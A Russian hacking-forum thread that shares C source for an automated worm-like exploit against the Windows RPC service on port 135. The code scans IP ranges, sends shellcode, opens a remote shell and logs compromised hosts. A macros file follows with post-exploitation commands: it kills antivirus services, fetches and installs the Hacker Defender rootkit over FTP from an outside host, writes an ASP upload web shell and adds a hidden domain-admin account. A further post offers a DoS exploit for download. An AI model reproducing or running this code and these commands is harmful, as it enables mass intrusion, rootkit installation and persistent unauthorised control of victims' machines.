unsigned short lportl=666; /* drg */ char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */ unsigned char buf1[0x1000]; u_long tmp=1; //TIMEOUTS FILE *w2k; FILE *wxp; int i; fd_set fds;
EnterCriticalSection(&csshell);
target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(linea); target_ip.sin_port = htons(port);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1) { printf(" - Connecting to %s\n",linea);
tmp=1; ioctlsocket( sock, FIONBIO, &tmp); tv.tv_sec = CONNECT; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)); //if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR) // if (i!=0) if((i=select(sock+1,0,&fds,0,&tv))>0) { printf(" Sending Exploit to a %s Server...",targets[peta].os); tmp=0; ioctlsocket( sock, FIONBIO, &tmp); if (send(sock,bindstr,sizeof(bindstr),0)>0) { tmp=1; ioctlsocket( sock, FIONBIO, &tmp); tv.tv_sec = RECV; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock, &fds); if(select(sock +1, &fds, NULL, NULL, &tv) > 0) { recv(sock, buf1, 1000, 0);
lportl=htons(RPORT); memcpy(&lport[1], &lportl, 2); *(long*)lport = *(long*)lport ^ 0x9432BF80; memcpy(&winshellcode[1351],&lport,4); memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4); tmp=0; ioctlsocket( sock, FIONBIO, &tmp);
send(sock,winshellcode,1705,0); sleep(50); if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1) { target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(linea); target_ip.sin_port = htons(RPORT); tmp=1; ioctlsocket( sock2, FIONBIO, &tmp); tv.tv_sec = CONNECT; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock2, &fds); connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip)); if((i=select(sock+1,0,&fds,0,&tv))>0) { printf("\n - Conectando con la Shell Remota...\n\n"); salir=0; shell(sock2); #ifdef WIN32 closesocket(sock2); #else close(sock2); #endif strcat(linea,"\n"); if (peta==0) { w2k=fopen("win2k.txt","a"); if (w2k!=NULL) { fputs(linea,w2k); fclose(w2k);} else printf(" !!UNABLE TO LOG IP %s",linea);
} else {
wxp=fopen("winxp.txt","a"); if (wxp!=NULL) {fputs(linea,wxp); fclose(wxp);} else printf(" !!UNABLE TO LOG IP %s",linea); } //} else printf("UNABLE TO CONNECT TO SHELL\n"); } else printf("FAILED\n"); } else printf("\n UNABLE TO CREATE SOCK2\n"); } else printf(" FAILED to send Exploit2\n"); } else printf(" FAILED to send Exploit\n"); }
} //if (AUTOHACKING!=1) LeaveCriticalSection(&csshell);
}
/*****************/ char *givemeip(char *ip) {
EnterCriticalSection(&cs);
if (ip1[3]!=254) ip1[3]++; else { return(NULL); //uhh kiddiss!
} if (ip1[2]==255) { ip1[2]++; ip1[1]++;}
LeaveCriticalSection(&cs);
if (ip1[2]>ip2[2]) return(NULL); if (ip1[2]==ip2[2]) if (ip1[3]>ip2[3]) return(NULL);
sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);
return(ip); }
/*****************/
//int version(char *ip, int sock)
int version(char ip[16], int sock) { //un poco de ettercap...
unsigned char peer0_0[] = { 0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };
unsigned char peer0_1[] = { 0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00 };
/*
unsigned char win2kvuln[] = { 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00}; */ fd_set fds2; unsigned char buf[1024];
int l; struct timeval tv2; FD_ZERO(&fds2); FD_SET(sock, &fds2); tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT; tv2.tv_usec = 0;
memset(buf,'\0',sizeof(buf)); send(sock,peer0_0,sizeof(peer0_0),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { l=recv (sock, buf, sizeof (buf),0); // for(i=0;i<52;i++) // { // if (i==28) i=i+4; // if (buf[i+32]!=win2kvuln[i]) // { send(sock,peer0_1,sizeof(peer0_1),0); if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) { memset(buf,'\0',sizeof(buf)); l=recv (sock, buf, sizeof (buf),0); if (l==32) { closesocket(sock); return(1);//winxp } else { #ifdef WIN32 closesocket(sock); #else close(sock); #endif return(0);//win2kby default. Nt4 not added.. } } else return(-1); // }
//} // closesocket(sock); // return(0);//win2k } closesocket(sock); return(-1); //Unknown } /****************/
void checkea(void *threadn) { char ip[16]; char ip2[17]; int sock,i; struct sockaddr_in target_ip; fd_set fds; u_long tmp=1; struct timeval tv;
EnterCriticalSection(&css); threads++; sleep(1); LeaveCriticalSection(&css); memset(ip,'\0',sizeof(ip)); while (givemeip(ip)!=NULL) { //printf("Checkeando IP: %s\n",ip); target_ip.sin_family = AF_INET; target_ip.sin_addr.s_addr = inet_addr(ip); target_ip.sin_port = htons(135); closesocket(sock); if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1) { tmp=1; ioctlsocket( sock, FIONBIO, &tmp); tv.tv_sec = CONNECT; tv.tv_usec = 0; FD_ZERO(&fds); FD_SET(sock, &fds);
connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip)); if((i=select(sock+1,0,&fds,0,&tv))>0) { sprintf(ip2,"%s\n",ip); EnterCriticalSection(&cslog); fputs(ip2,results); rpcopen++; LeaveCriticalSection(&cslog); attack(ip,version(ip,sock));
} } closesocket(sock); memset(ip,'\0',sizeof(ip)); } EnterCriticalSection(&css); threads--; sleep(1); LeaveCriticalSection(&css); //printf("Thread %i saliendo\n",(int)threadn); _endthread();
}
/*****************/
Вот и еще файл macros.txt (прилагался в комплекте; видимо это просто Хелп к сплоиту)
[Macro] name=kill_avs key=!1 delay=500 cmd=net stop Mcshield cmd=net stop "Norton Antivirus Service" cmd=net stop "Panda Antivirus" cmd=net stop "ZoneAlarm" cmd=net stop "Detector de OfficeScanNT" cmd=net stop "McAfee Framework Service"
[Macro] name=upload_FTP key=!2 delay=500 cmd=echo open xx.xx.xx.xx 1212>a cmd=echo ftp>>a cmd=echo ftp>>a cmd=echo bin>>a cmd=echo get hxdef.exe>>a cmd=echo get hxdef.ini>>a cmd=echo bye>>a cmd=start ftp -s:a
[Macro] name=Upload_tftp key=!3 delay=500 cmd=tftp -i blablablabla cmd=tftp -i blablablabla cmd=tftp -i blablablabla
[Macro] name=Upload_ASP key=!4 delay=500 cmd=echo ^^^upload.asp^^^ >upload.asp cmd=echo ^ >>upload.asp cmd=echo ^ >>upload.asp cmd=echo ^^ >>upload.asp cmd=echo ^<!--#INCLUDE FILE="upload.inc"--^> >>upload.asp cmd=echo ^<% >>upload.asp cmd=echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.asp cmd=echo Set Fields = GetUpload() >>upload.asp cmd=echo FilePath = Server.MapPath(".") ^& "\" ^& Fields("File1").FileName >>upload.asp cmd=echo Fields("File1").Value.SaveAs FilePath >>upload.asp cmd=echo End If >>upload.asp cmd=echo %%^> >>upload.asp cmd=@echo UPLOAD.ASP SUCCESSFULLY SENT. NOW SENDING UPLOAD.INC cmd=@echo ^<script RUNAT=SERVER LANGUAGE=VBSCRIPT^> >>upload.inc cmd=@echo Const IncludeType = 2 >>upload.inc cmd=@echo Dim UploadSizeLimit >>upload.inc cmd=@echo Function GetUpload() >>upload.inc cmd=@echo Dim Result >>upload.inc cmd=@echo Set Result = Nothing >>upload.inc cmd=@echo If Request.ServerVariables("REQUEST_METHOD") = "POST" Then >>upload.inc cmd=@echo Dim CT, PosB, Boundary, Length, PosE >>upload.inc cmd=@echo CT = Request.ServerVariables("HTTP_Content_Type") >>upload.inc cmd=@echo If LCase(Left(CT, 19)) = "multipart/form-data" Then >>upload.inc cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc cmd=@echo If PosB ^> 0 Then Boundary = Mid(CT, PosB + 9) >>upload.inc cmd=@echo PosB = InStr(LCase(CT), "boundary=") >>upload.inc cmd=@echo If PosB ^> 0 then >>upload.inc cmd=@echo PosB = InStr(Boundary, ",") >>upload.inc cmd=@echo If PosB ^> 0 Then Boundary = Left(Boundary, PosB - 1) >>upload.inc cmd=@echo end if >>upload.inc cmd=@echo Length = CLng(Request.ServerVariables("HTTP_Content_Length")) >>upload.inc cmd=@echo If "" ^& UploadSizeLimit ^<^> "" Then >>upload.inc cmd=@echo UploadSizeLimit = CLng(UploadSizeLimit) >>upload.inc cmd=@echo If Length ^> UploadSizeLimit Then >>upload.inc cmd=@echo Request.BinaryRead (Length) >>upload.inc cmd=@echo Err.Raise 2, "GetUpload", "Upload size " ^& FormatNumber(Length, 0) ^& "B exceeds limit of " ^& FormatNumber(UploadSizeLimit, 0) ^& "B" >>upload.inc cmd=@echo Exit Function >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo If Length ^> 0 And Boundary ^<^> "" Then >>upload.inc cmd=@echo Boundary = "--" ^& Boundary >>upload.inc cmd=@echo Dim Head, Binary >>upload.inc cmd=@echo Binary = Request.BinaryRead(Length) >>upload.inc cmd=@echo Set Result = SeparateFields(Binary, Boundary) >>upload.inc cmd=@echo Binary = Empty >>upload.inc cmd=@echo Else >>upload.inc cmd=@echo Err.Raise 10, "GetUpload", "Zero length request ." >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo Else >>upload.inc cmd=@echo Err.Raise 11, "GetUpload", "No file sent." >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo Else >>upload.inc cmd=@echo Err.Raise 1, "GetUpload", "Bad request method." >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo Set GetUpload = Result >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function SeparateFields(Binary, Boundary) >>upload.inc cmd=@echo Dim PosOpenBoundary, PosCloseBoundary, PosEndOfHeader, isLastBoundary >>upload.inc cmd=@echo Dim Fields >>upload.inc cmd=@echo Boundary = StringToBinary(Boundary) >>upload.inc cmd=@echo PosOpenBoundary = InStrB(Binary, Boundary) >>upload.inc cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary, 0) >>upload.inc cmd=@echo Set Fields = CreateObject("Scripting.Dictionary") >>upload.inc cmd=@echo Do While (PosOpenBoundary ^> 0 And PosCloseBoundary ^> 0 And Not isLastBoundary) >>upload.inc cmd=@echo Dim HeaderContent, FieldContent, bFieldContent >>upload.inc cmd=@echo Dim Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc cmd=@echo Dim Field, TwoCharsAfterEndBoundary >>upload.inc cmd=@echo PosEndOfHeader = InStrB(PosOpenBoundary + Len(Boundary), Binary, StringToBinary(vbCrLf + vbCrLf)) >>upload.inc cmd=@echo HeaderContent = MidB(Binary, PosOpenBoundary + LenB(Boundary) + 2, PosEndOfHeader - PosOpenBoundary - LenB(Boundary) - 2) >>upload.inc cmd=@echo bFieldContent = MidB(Binary, (PosEndOfHeader + 4), PosCloseBoundary - (PosEndOfHeader + 4) - 2) >>upload.inc cmd=@echo GetHeadFields BinaryToString(HeaderContent), Content_Disposition, FormFieldName, SourceFileName, Content_Type >>upload.inc cmd=@echo Set Field = CreateUploadField() >>upload.inc cmd=@echo Set FieldContent = CreateBinaryData() >>upload.inc cmd=@echo FieldContent.ByteArray = bFieldContent >>upload.inc cmd=@echo FieldContent.Length = LenB(bFieldContent) >>upload.inc cmd=@echo Field.Name = FormFieldName >>upload.inc cmd=@echo Field.ContentDisposition = Content_Disposition >>upload.inc cmd=@echo Field.FilePath = SourceFileName >>upload.inc cmd=@echo Field.FileName = GetFileName(SourceFileName) >>upload.inc cmd=@echo Field.ContentType = Content_Type >>upload.inc cmd=@echo Field.Length = FieldContent.Length >>upload.inc cmd=@echo Set Field.Value = FieldContent >>upload.inc cmd=@echo Fields.Add FormFieldName, Field >>upload.inc cmd=@echo TwoCharsAfterEndBoundary = BinaryToString(MidB(Binary, PosCloseBoundary + LenB(Boundary), 2)) >>upload.inc cmd=@echo isLastBoundary = TwoCharsAfterEndBoundary = "--" >>upload.inc cmd=@echo If Not isLastBoundary Then >>upload.inc cmd=@echo PosOpenBoundary = PosCloseBoundary >>upload.inc cmd=@echo PosCloseBoundary = InStrB(PosOpenBoundary + LenB(Boundary), Binary, Boundary) >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo Loop >>upload.inc cmd=@echo Set SeparateFields = Fields >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function GetHeadFields(ByVal Head, Content_Disposition, Name, FileName, Content_Type) >>upload.inc cmd=@echo Content_Disposition = LTrim(SeparateField(Head, "content-disposition:", ";")) >>upload.inc cmd=@echo Name = (SeparateField(Head, "name=", ";")) >>upload.inc cmd=@echo If Left(Name, 1) = """" Then Name = Mid(Name, 2, Len(Name) - 2) >>upload.inc cmd=@echo FileName = (SeparateField(Head, "filename=", ";")) >>upload.inc cmd=@echo If Left(FileName, 1) = """" Then FileName = Mid(FileName, 2, Len(FileName) - 2) >>upload.inc cmd=@echo Content_Type = LTrim(SeparateField(Head, "content-type:", ";")) >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function SeparateField(From, ByVal sStart, ByVal sEnd) >>upload.inc cmd=@echo Dim PosB, PosE, sFrom >>upload.inc cmd=@echo sFrom = LCase(From) >>upload.inc cmd=@echo PosB = InStr(sFrom, sStart) >>upload.inc cmd=@echo If PosB ^> 0 Then >>upload.inc cmd=@echo PosB = PosB + Len(sStart) >>upload.inc cmd=@echo PosE = InStr(PosB, sFrom, sEnd) >>upload.inc cmd=@echo If PosE = 0 Then PosE = InStr(PosB, sFrom, vbCrLf) >>upload.inc cmd=@echo If PosE = 0 Then PosE = Len(sFrom) + 1 >>upload.inc cmd=@echo SeparateField = Mid(From, PosB, PosE - PosB) >>upload.inc cmd=@echo Else >>upload.inc cmd=@echo SeparateField = Empty >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function GetFileName(FullPath) >>upload.inc cmd=@echo Dim Pos, PosF >>upload.inc cmd=@echo PosF = 0 >>upload.inc cmd=@echo For Pos = Len(FullPath) To 1 Step -1 >>upload.inc cmd=@echo Select Case Mid(FullPath, Pos, 1) >>upload.inc cmd=@echo Case "/", "\": PosF = Pos + 1: Pos = 0 >>upload.inc cmd=@echo End Select >>upload.inc cmd=@echo Next >>upload.inc cmd=@echo If PosF = 0 Then PosF = 1 >>upload.inc cmd=@echo GetFileName = Mid(FullPath, PosF) >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function BinaryToString(Binary) >>upload.inc cmd=@echo dim cl1, cl2, cl3, pl1, pl2, pl3 >>upload.inc cmd=@echo Dim L >>upload.inc cmd=@echo cl1 = 1 >>upload.inc cmd=@echo cl2 = 1 >>upload.inc cmd=@echo cl3 = 1 >>upload.inc cmd=@echo L = LenB(Binary) >>upload.inc cmd=@echo Do While cl1^<=L >>upload.inc cmd=@echo pl3 = pl3 ^& Chr(AscB(MidB(Binary,cl1,1))) >>upload.inc cmd=@echo cl1 = cl1 + 1 >>upload.inc cmd=@echo cl3 = cl3 + 1 >>upload.inc cmd=@echo if cl3^>300 then >>upload.inc cmd=@echo pl2 = pl2 ^& pl3 >>upload.inc cmd=@echo pl3 = "" >>upload.inc cmd=@echo cl3 = 1 >>upload.inc cmd=@echo cl2 = cl2 + 1 >>upload.inc cmd=@echo if cl2^>200 then >>upload.inc cmd=@echo pl1 = pl1 ^& pl2 >>upload.inc cmd=@echo pl2 = "" >>upload.inc cmd=@echo cl2 = 1 >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo End If >>upload.inc cmd=@echo Loop >>upload.inc cmd=@echo BinaryToString = pl1 ^& pl2 ^& pl3 >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function BinaryToStringold(Binary) >>upload.inc cmd=@echo Dim I, S >>upload.inc cmd=@echo For I = 1 To LenB(Binary) >>upload.inc cmd=@echo S = S ^& Chr(AscB(MidB(Binary, I, 1))) >>upload.inc cmd=@echo Next >>upload.inc cmd=@echo BinaryToString = S >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function StringToBinary(String) >>upload.inc cmd=@echo Dim I, B >>upload.inc cmd=@echo For I=1 to len(String) >>upload.inc cmd=@echo B = B ^& ChrB(Asc(Mid(String,I,1))) >>upload.inc cmd=@echo Next >>upload.inc cmd=@echo StringToBinary = B >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo Function vbsSaveAs(FileName, ByteArray) >>upload.inc cmd=@echo Dim FS, TextStream>>upload.inc cmd=@echo Set FS = CreateObject("Scripting.FileSystemObject") >>upload.inc cmd=@echo Set TextStream = FS.CreateTextFile(FileName) >>upload.inc cmd=@echo TextStream.Write BinaryToString(ByteArray) >>upload.inc cmd=@echo TextStream.Close >>upload.inc cmd=@echo End Function >>upload.inc cmd=@echo ^ >>upload.inc cmd=@echo ^<script RUNAT=SERVER LANGUAGE=JSCRIPT^> >>upload.inc cmd=@echo function CreateUploadField(){ return new uf_Init() } >>upload.inc cmd=@echo function uf_Init(){ >>upload.inc cmd=@echo this.Name = null >>upload.inc cmd=@echo this.ContentDisposition = null >>upload.inc cmd=@echo this.FileName = null >>upload.inc cmd=@echo this.FilePath = null >>upload.inc cmd=@echo this.ContentType = null >>upload.inc cmd=@echo this.Value = null >>upload.inc cmd=@echo this.Length = null >>upload.inc cmd=@echo } >>upload.inc cmd=@echo function CreateBinaryData(){ return new bin_Init() } >>upload.inc cmd=@echo function bin_Init(){ >>upload.inc cmd=@echo this.ByteArray = null >>upload.inc cmd=@echo this.Length = null >>upload.inc cmd=@echo this.String = jsBinaryToString >>upload.inc cmd=@echo this.SaveAs = jsSaveAs >>upload.inc cmd=@echo } >>upload.inc cmd=@echo function jsBinaryToString(){ >>upload.inc cmd=@echo return BinaryToString(this.ByteArray) >>upload.inc cmd=@echo } >>upload.inc cmd=@echo function jsSaveAs(FileName){ >>upload.inc cmd=@echo return vbsSaveAs(FileName, this.ByteArray) >>upload.inc cmd=@echo } >>upload.inc cmd=@echo ^>>upload.inc
[Macro] name=Adduser key=!5 delay=500 cmd=net user SUPPORT_3569a74r KaHTSecuritycheck/add cmd=net localgroup Administradores SUPPORT_3569a74r /add cmd=net localgroup Administrators SUPPORT_3569a74r /add cmd=net group "Domain Admins" SUPPORT_3569a74r /add
[Macro] name=Killhax0rs key=!6 delay=500 cmd=net stop serv-u cmd=net stop r_server cmd=net stop "DAmeware 2.6" cmd=net stop "RA Server" cmd=net stop firedaemon....
[Macro] name=upload_FTP key=!9 delay=300 cmd=echo open xx.xx.xxx.xx 1212>a cmd=echo ftp>>a cmd=echo ftp>>a cmd=echo bin>>a cmd=echo get hxdef.exe>>a cmd=echo get hxdef.ini>>a cmd=echo bye>>a cmd=ftp -s:a delay=5000 cmd=dir c:\ /a cmd=dir d:\ /a cmd=dir e:\ /a cmd=hxdef.exe -:installonly cmd=del a cmd=net start hackerdefender
| |
| |
15.03.2006 - 18:47 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| QUOTE сказали аха и все забили! Нет, не забили Cerberus FTP Server 2.32 Denial of Service Exploit.Exploit: аттач в .тхт Присоединённые файлы
Cerberus_FTP_Server_2.32_Denial_of_Service_Exploit.rar ( 1.04кб )
Кол-во скачиваний: 79 | |
| |
|
|